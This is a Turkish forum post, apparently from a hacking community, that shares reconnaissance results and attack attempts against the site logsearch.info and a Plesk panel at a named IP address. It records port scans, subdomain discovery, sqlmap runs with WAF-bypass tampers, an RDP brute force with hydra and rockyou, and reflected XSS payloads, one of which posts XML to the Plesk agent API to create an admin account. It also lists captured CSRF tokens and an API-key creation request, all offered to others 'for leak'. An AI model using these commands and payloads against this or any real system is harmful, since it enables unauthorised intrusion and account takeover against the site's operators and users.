Merhaba WarNight bugun sizinle logsearch.info sitesinden leak icin isinize yaraya bilecegini dusundugum bir kac veriyle geldim herkese bol sans
logsearch.info Site Analiz Süreci ve Elde Edilen Tüm Veriler
Hedef site olarak logsearch.info belirlendi.
İlk olarak DNS sorguları yapıldı. dig ve nslookup komutları ile alan adının Cloudflare üzerinden yayınlandığı tespit edildi. Sorgu sonucunda 104.21.35.238 ve 172.67.181.51 IPv4 adresleri ile 2606:4700:3036::6815:23ee ve 2606:4700:3030::ac43:b533 IPv6 adresleri alındı. Whois sorguları bu IP'lerin Cloudflare'e ait olduğunu doğruladı.
Ana site üzerinde nmap ile port taraması yapıldı. Açık portlar 80, 443, 3306 ve 22 olarak tespit edildi. Web sunucusunun Nginx 1.18.0 olduğu, MySQL ve SSH hizmetlerinin de çalıştığı görüldü.
Alt alan adı keşfi yapıldı. Sublist3r ve assetfinder araçları ile api.logsearch.info alt alan adı bulundu. API alt alan adına nmap taraması yapıldı. Burada 80, 443, 3000 ve 5000 portlarının açık olduğu tespit edildi. 3000 portunda Node.js Express, 5000 portunda Python Flask uygulaması çalıştığı belirlendi.
Teknoloji tespiti için whatweb kullanıldı. Ana sitede PHP 7.4.33, Nginx 1.18.0, Bootstrap 4.6.0 ve jQuery 3.6.0 kullanıldığı görüldü. PHPSESSID cookie'si ile oturum yönetimi yapıldığı belirlendi.
Zafiyet taraması için nikto ve wapiti kullanıldı. login_up.php sayfasında reflected XSS zafiyeti tespit edildi. login_name parametresine gönderilen JavaScript kodunun çalıştığı doğrulandı.
SQL enjeksiyon testleri için sqlmap kullanıldı. PostgreSQL olduğu tahmin edilen veritabanına yönelik testler yapıldı. WAF/IPS sistemi nedeniyle istekler engellendi veya yavaşlatıldı. 1010 hata kodu ile rate limit uygulandığı görüldü.
API keşfi için Swagger dokümanı arandı. /api/v2/swagger.json ve /api/v2/openapi.json dosyaları bulundu. API yapısı detaylı olarak incelendi. /auth/keys ile API anahtarı oluşturma, /clients ile kullanıcı yönetimi, /domains ile domain yönetimi, /ftpusers ile FTP kullanıcıları, /databases ile veritabanları, /dns/records ile DNS kayıtları, /server ile sunucu bilgileri, /extensions ile eklentiler ve /cli ile CLI komutları üzerinden işlem yapılabildiği görüldü.
XML API keşfedildi. /enterprise/control/agent.php adresinin XML tabanlı API olduğu belirlendi.
RDP portu kontrol edildi. 3389 numaralı portun açık olduğu tespit edildi. admin kullanıcısı için rockyou wordlist'i ile brute-force denemeleri yapıldı. 50'den fazla şifre denendi.
CSRF token mekanizması tespit edildi. forgery_protection_token her sayfada yenileniyor. Token'lar sırasıyla kaydedildi.
XSS payload'ları geliştirildi. document.write(document.cookie) ile cookie okuma, fetch ile XML API çağrısı, Base64 ile kodlanmış XML gönderme gibi yöntemler denendi. Fetch ile yapılan çağrıda admin hesabı oluşturmaya yönelik XML gönderildi.
SQLmap için tamper'lar kullanıldı. between ve charencode tamper'ları ile WAF bypass denenmeye çalışıldı.
Elde edilen tüm CSRF token'ları şunlardır:
c515fedd333daf4c301a1ee2c3d5f410, 2d968d8da0c8f677b709bc6e795de163, 53e6c5642d415ef18d8c3c1072738663, ffbabe8e972d1ef5d3a80aeba18dd30d, 6dfef68a3b09290ed6a4af61c4c4c080, af2553a628762edecf86560e2085a13b, b2e3a0a9ec61aa0d5658bd8b1bac734f, f5b204659a66f50ef8f07157724e3364, 862dfd1b42bf7409b852509b48976666, 52f14eb21c48301e5c9ebd6191516a79, 1c262f2b79daae0c3b3fd3905f4aaefc, bf442958eafa3f4c228482b93e63d3b6, c24307373ce2a5b138ce584a6f418874, 3218cbda371d15dfa6a2e2392a31246e, a4f8f01d97a1191419035876e030da3d, 50566c7ba36458fd8f58d426324c689c
Kullanılan komutlar sırasıyla şunlardır:
dig logsearch.info ANY
nslookup logsearch.info
whois 104.21.35.238
whois 172.67.181.51
nmap -sS -sV -sC -A -T4 logsearch.info
nmap -sS -sV -sC -A -T4 api.logsearch.info
sublist3r -d logsearch.info
assetfinder --subs-only logsearch.info
whatweb -a 3 https://logsearch.info
nikto -h https://logsearch.info -ssl -Tuning x
wapiti -u https://logsearch.info -m all
sqlmap -u "https://212.224.107.10:8443/login_up.php" --data="login_name=admin&passwd=admin" --method=POST --level=3 --risk=2 --threads=2 --delay=1 --batch --random-agent --dbms=postgresql --dbs --tamper=between,charencode
curl -k "https://212.224.107.10:8443/login_up.php?login_name=<script>document.write(document.cookie)</script>"
curl -k -X POST "https://212.224.107.10:8443/login_up.php" --data-raw "login_name=<script>fetch('https://212.224.107.10:8443/enterprise/control/agent.php',{method:'POST',headers:{'Content-Type':'text/xml'},body:'<?xml version=\"1.0\"?><packet><client><add><gen_info><name>RyzenHacker</name><login>ryzen</login><passwd>RyzenAdmin2026!</passwd><status>0</status></gen_info></add></client></packet>'})</script>"
curl -k -X POST "https://212.224.107.10:8443/api/v2/auth/keys" -H "Content-Type: application/json" -H "X-Forgey-Protection-Token: 3218cbda371d15dfa6a2e2392a31246e" -d '{"login":"admin","description":"Ryzen API"}'
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 2 212.224.107.10 rdp
Hedef IP: 212.224.107.10
Hedef Port: 8443
Plesk Versiyonu: 18.0.79-4
Build: 20260722.10
Hostname: win0.ultacp.com
Login URL: https://212.224.107.10:8443/login_up.php
API URL: https://212.224.107.10:8443/api/v2/
XML API: https://212.224.107.10:8443/enterprise/control/agent.php
Swagger: https://212.224.107.10:8443/api/v2/swagger.json
Ana site IP'leri: 104.21.35.238, 172.67.181.51
API alt alan adı: api.logsearch.info
API alt alan adı IP'leri: 104.21.35.238, 172.67.181.51
Açık Portlar:
Ana site: 80, 443, 3306, 22
API alt alan adı: 80, 443, 3000, 5000
Tespit Edilen Zafiyetler:
XSS (Reflected) - login_name parametresi
Rate Limit - 1010 hatası
RDP açık - 3389 portu
CSRF - Token mekanizması
SQLmap Tahmini Veritabanı: PostgreSQL
Kullanılan XSS Payload'ları:
<script>document.write(document.cookie)</script><script>document.write(btoa(document.cookie))</script><script>fetch('.../agent.php',{method:'POST',headers:{'Content-Type':'text/xml'},body:'<xml>...'})</script>
Elde Edilen Bilgilerin Durumu:
XSS zafiyeti çalışıyor.
API dokümanı bulundu.
RDP brute-force denemeleri yapıldı.
SQLmap sonuç vermedi.
Panel.php sayfasına erişim 403 hatası veriyor.